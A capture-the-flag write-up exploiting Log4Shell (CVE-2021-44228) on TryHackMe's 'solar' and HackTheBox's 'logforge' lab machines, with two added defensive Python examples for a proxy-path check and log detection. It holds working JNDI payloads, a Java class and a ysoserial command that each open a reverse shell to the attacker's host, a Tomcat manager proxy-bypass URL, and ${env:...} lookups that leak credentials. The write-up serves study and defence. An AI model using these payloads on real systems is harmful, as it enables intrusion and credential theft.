Exploiting log4jshell (CVE-2021-44228) - solar (THM) and logforge (HTB)

n00🔑
Dec 17, 2021

Hi readers, here we will be looking into the exploitation of CVE-2021-44228.

THM- solar

https://tryhackme.com/room/solar

Start the lab machine and let's begin with reconnaissance.

TASK 2 (Reconnaissance)

nmap -Pn -sS -p- -T4 -vvv --script discovery -sV --version-all -sC -O --max-retries 2 -oN discovery_10.10.171.12.out 10.10.171.12
autorecon -vvv 10.10.171.12

Going through the results, we find HTTP running on TCP port 8983; the service banner identifies it as Apache Solr.

We also find SSH running on port 22. A simple Google search of the SSH version header leads us to the Ubuntu release, which is Bionic Beaver.

Task 2 answers:

TASK 3 (Discovery)

Accessing the web server via a browser gives us a ton of information about the tool/software running.

We have been provided with a zip file containing multiple log files. Answer the questions by analyzing the files.

TASK 4 and 5 (POC, Exploitation)

If we place the Log4Shell POC payload in the path (/admin/cores) that we saw in the log file, we get a connection back.

${jndi:ldap://ATTACKERCONTROLLEDHOST}

Note: this POC can be tried anywhere user-controlled input is being logged.

nc -lnvp 9999
curl 'http://10.10.114.97:8983/solr/admin/cores?foo=$\{jndi:ldap://10.17.7.105:9999\}'
curl 'http://10.10.114.97:8983/solr/admin/cores?foo=$\{jndi:rmi://10.17.7.105:9999/lollz\}'

Installing Java 8 manually (it is a prerequisite for our LDAP server, which will translate LDAP requests into HTTP):

update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_311/bin/java" 1
update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_311/bin/javac" 1
update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_311/bin/javaws" 1
update-alternatives --set java /usr/lib/jvm/jdk1.8.0_311/bin/java
update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_311/bin/javac
update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_311/bin/javaws
java -version
apt install maven
# Compiles the marshalsec project (https://github.com/mbechler/marshalsec)
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://10.17.7.105:8000/#Exploit"

Now our LDAP server is running and will forward requests to the HTTP server, which will host our payload.

The next step is to compile and host the Exploit payload (we are using a netcat reverse shell payload in this case):

public class Exploit {
    // The static initializer runs as soon as the vulnerable JVM loads this class.
    static {
        try {
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash 10.17.7.105 9999");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

javac Exploit.java -source 8 -target 8

Now it's time to pwn the server :)

curl 'http://10.10.156.44:8983/solr/admin/cores?foo=$\{jndi:ldap://10.17.7.105:1389/Exploit\}'

HTB- logforge

Apache reverse proxy bypass:

http://10.10.11.138/portal/..;/manager/html/expire?path=/
or
http://10.10.11.138/;name=lollz/manager/html/upload
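Why the two URLs above get past the proxy: Apache compares the raw request path against its rules, while Tomcat strips `;param` path parameters from every segment and only then resolves `..`. The following added example (not code from the write-up, Apache or Tomcat; the normalizer is a simplified model of Tomcat's behaviour) shows the backend's view of each request next to a prefix-only proxy rule and a corrected rule that normalizes the same way the backend does.

```python
"""Added example (not from the original write-up or from Tomcat/Apache):
a simplified model of how Tomcat normalizes a request path before mapping
it, used to show why a reverse-proxy rule that only looks at the raw path
prefix lets '/portal/..;/manager/...' reach the Tomcat manager."""
from urllib.parse import unquote


def tomcat_normalize(raw_path: str) -> str:
    """Approximate Tomcat's path handling (assumption: simplified model).
    1. percent-decode the path
    2. strip ';param' path parameters from every segment
    3. resolve '.' and '..' segments against the remaining ones
    """
    path = unquote(raw_path.split("?", 1)[0])
    resolved = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]  # '..;' becomes '..', ';name=lollz' becomes ''
        if seg in ("", "."):
            continue
        if seg == "..":
            if resolved:
                resolved.pop()
            continue
        resolved.append(seg)
    return "/" + "/".join(resolved)


def naive_proxy_denies(raw_path: str, denied_prefix: str = "/manager") -> bool:
    """The weak rule: compare the raw request path with the denied prefix."""
    return raw_path.startswith(denied_prefix)


def backend_aware_denies(raw_path: str, denied_prefix: str = "/manager") -> bool:
    """The corrected rule: normalize as the backend will, then compare."""
    return tomcat_normalize(raw_path).startswith(denied_prefix)


# Constructed requests mirroring the two bypass shapes from the write-up.
SAMPLE_REQUESTS = [
    "/manager/html",
    "/portal/..;/manager/html/expire?path=/",
    "/;name=lollz/manager/html/upload",
    "/portal/index.jsp",
]


def compare_rules(requests=SAMPLE_REQUESTS):
    """Return (raw, tomcat_view, naive_blocks, corrected_blocks) per request."""
    return [
        (r, tomcat_normalize(r), naive_proxy_denies(r), backend_aware_denies(r))
        for r in requests
    ]


if __name__ == "__main__":
    for raw, seen, naive, fixed in compare_rules():
        print(f"{raw:45} -> {seen:30} naive_blocks={naive} fixed_blocks={fixed}")
```

The practical takeaway for the proxy side is that access rules must be evaluated on the path as the backend will interpret it, or the manager application must be disabled or bound to localhost on the backend itself rather than hidden by a prefix rule in front of it.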

Finding out that Tomcat is using log4j…

Using JNDI-Exploit-Kit (https://github.com/pimps/JNDI-Exploit-Kit) and ysoserial-modified (https://github.com/pimps/ysoserial-modified):

a) Creating the serialized object:

java -jar ysoserial-modified.jar CommonsCollections5 bash 'sh -i >& /dev/tcp/10.10.14.40/53 0>&1' > /mnt/Ethical_Hacking/Box/APNA/Everything/Ethical_Hacking/Practice_LABS/hackthebox/Machines/LogForge-10.10.11.138/cc5.ser

b) Using the JNDI Injection Exploit Kit to set up the LDAP server:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.40:1389 -P /mnt/Ethical_Hacking/Box/APNA/Everything/Ethical_Hacking/Practice_LABS/hackthebox/Machines/LogForge-10.10.11.138/cc5.ser

c) Getting a reverse shell:

ldap://10.10.14.40:1389/a8ziqy
${jndi:ldap://10.10.14.40:1389/a8ziqy}

d) Finding a Java-based FTP server running.

e) Testing the FTP server for JNDI injection.

f) Checking out the Java-based FTP server's source code:

Here we found that the username and password are stored in environment variables, and we can read these using JNDI injection!

g) Reading environment variables. The way this works is that the resolved value reaches our LDAP server inside the lookup request, but the server has no functionality to display it, so we will use Wireshark to see the traffic:

${jndi:ldap://<IP>:<PORT>/${env:<var_name>}}
${jndi:ldap://10.10.14.40:1389/${env:ftp_user}}

The FTP username is ippsec.

Similarly, we can get the password:

[screenshot: log4j_env_leakage]

Other useful info:

${jndi:ldap://10.10.14.40:1389/${java:version}}
${jndi:ldap://10.10.14.40:1389/${java:os}}
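From the defender's side, the payloads used in Task 4/5 and the `${env:...}` / `${java:...}` leakage payloads above all leave the same trace in the web server's access log: a `${...}` lookup in a logged field, often percent-encoded or wrapped in `${lower:j}` / `${::-j}` obfuscation. The following detector is an added example (not code from the write-up or from any of the tools it uses; the log lines are constructed to mirror the page's payloads). It folds the obfuscation before matching, reports which JNDI protocol was requested, and separately flags nested lookups that carry data out through the lookup host.

```python
"""Added example (not from the original write-up): a detector that scans
web-server log lines for Log4Shell lookup strings, folding the common
obfuscations (percent-encoding, ${lower:..}, ${upper:..}, ${..:-x} defaults)
before matching, and separately flagging nested lookups such as
${env:..} or ${java:..} that exfiltrate data through the lookup host.
The sample log lines are constructed for this example."""
import re
from urllib.parse import unquote

# Innermost ${...} with no further ${ inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# JNDI lookup with the protocols the vulnerable resolver accepts.
_JNDI = re.compile(r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://", re.IGNORECASE)
# Lookups commonly nested inside a JNDI URL to leak data.
_EXFIL = re.compile(
    r"\$\{(env|sys|java|hostName|main|log4j|ctx|bundle|date):[^}]*\}", re.IGNORECASE
)


def _resolve_inner(expr: str) -> str:
    """Collapse a lookup used only for obfuscation; keep real lookups intact.
    Real lookups are temporarily wrapped in \\x01..\\x02 so the loop ends."""
    if ":-" in expr:                       # ${any:-j} / ${::-j} -> 'j'
        return expr.split(":-", 1)[1]
    name, _, rest = expr.partition(":")
    if name.lower() == "lower":
        return rest.lower()
    if name.lower() == "upper":
        return rest.upper()
    return "\x01" + expr + "\x02"


def normalize(text: str) -> str:
    """Percent-decode and resolve obfuscating lookups from the inside out."""
    text = unquote(text)
    while True:
        m = _INNER.search(text)
        if not m:
            break
        text = text[: m.start()] + _resolve_inner(m.group(1)) + text[m.end():]
    return text.replace("\x01", "${").replace("\x02", "}")


def classify(line: str) -> dict:
    """Classify one log line after normalization."""
    norm = normalize(line)
    protocols = sorted({p.lower() for p in _JNDI.findall(norm)})
    exfil = [m.group(0) for m in _EXFIL.finditer(norm)]
    return {"jndi": bool(protocols), "protocols": protocols,
            "exfil": exfil, "normalized": norm}


def scan(log_text: str) -> list:
    """Return (line_no, protocols, exfil_lookups) for each suspicious line."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        r = classify(line)
        if r["jndi"] or r["exfil"]:
            hits.append((n, r["protocols"], r["exfil"]))
    return hits


# Constructed access-log lines: plain, percent-encoded+obfuscated, two
# env/java leakage attempts, and one benign request.
SAMPLE_LOG = """\
10.17.7.105 - - [17/Dec/2021:10:01:02 +0000] "GET /solr/admin/cores?foo=${jndi:ldap://10.17.7.105:1389/Exploit} HTTP/1.1" 200 -
10.17.7.105 - - [17/Dec/2021:10:01:05 +0000] "GET /solr/admin/cores?foo=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2F10.17.7.105%3A9999%2Flollz%7D HTTP/1.1" 200 -
10.10.14.40 - - [17/Dec/2021:10:02:11 +0000] "GET /solr/admin/cores?foo=${jndi:ldap://10.10.14.40:1389/${env:ftp_user}} HTTP/1.1" 200 -
10.10.14.40 - - [17/Dec/2021:10:02:12 +0000] "GET /solr/admin/cores?foo=${j${::-n}di:ldap://10.10.14.40:1389/${java:version}} HTTP/1.1" 200 -
192.0.2.7 - - [17/Dec/2021:10:03:00 +0000] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 -
"""

if __name__ == "__main__":
    for n, protocols, exfil in scan(SAMPLE_LOG):
        print(f"line {n}: jndi via {protocols or '-'} nested lookups {exfil or '-'}")
```

Running it over the sample flags lines 1 to 4 and leaves the STATUS request alone; the normalized form in the `classify` result is the string worth putting in an alert, since the raw line may not contain the literal `jndi:` at all. Double percent-encoding and lookups the attacker splits across several logged fields are outside what this single-line normalizer handles.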

Thanks for reading!

References:

https://twitter.com/marcioalm/status/1470361495405875200
